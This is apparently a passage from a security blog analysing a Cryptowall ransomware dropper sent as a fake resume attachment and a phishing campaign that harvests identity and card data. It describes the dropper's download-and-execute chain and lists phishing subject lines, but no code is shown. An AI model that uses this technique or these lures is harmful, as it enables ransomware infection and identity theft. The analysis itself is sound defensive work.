We can see that it was creating an ActiveXObject using an XMLHttpRequest object. This would create another ActiveXObject using ADODB.Stream to retrieve a binary file. This retrieved file would be saved to the %TEMP% folder into a file called something like "45645459.exe". Another ActiveXObject would be created to use WScript.shell to then execute the saved file. The URL the file was retrieved from was something like:
This may seem like you're just retrieving an image file, but if you actually retrieve it, it turns out to be a Windows executable. After analyzing the file, we have determined this is a Cryptowall ransomware variant. So if you open the attachment, thinking you'll be looking at a resume, you could end up with your entire system in trouble.
The From: header has addresses that look reasonably similar to the phished domain addresses as long as you don't look too closely.
Subject lines include:
- Un-authorized User
- Verification Required
- Must verify your account
- Validate account
They're not only asking for the victim's name and address, but also their Social Security number and a credit card number. When you click on the "Submit Form" button, all your data then goes to a server in Russia. All this information is more than enough to steal your identity.
The obfuscated version looks like this (partial code shown only):
After deobfuscation, it generated a perfectly normal looking HTML page with a form, like the following snippet: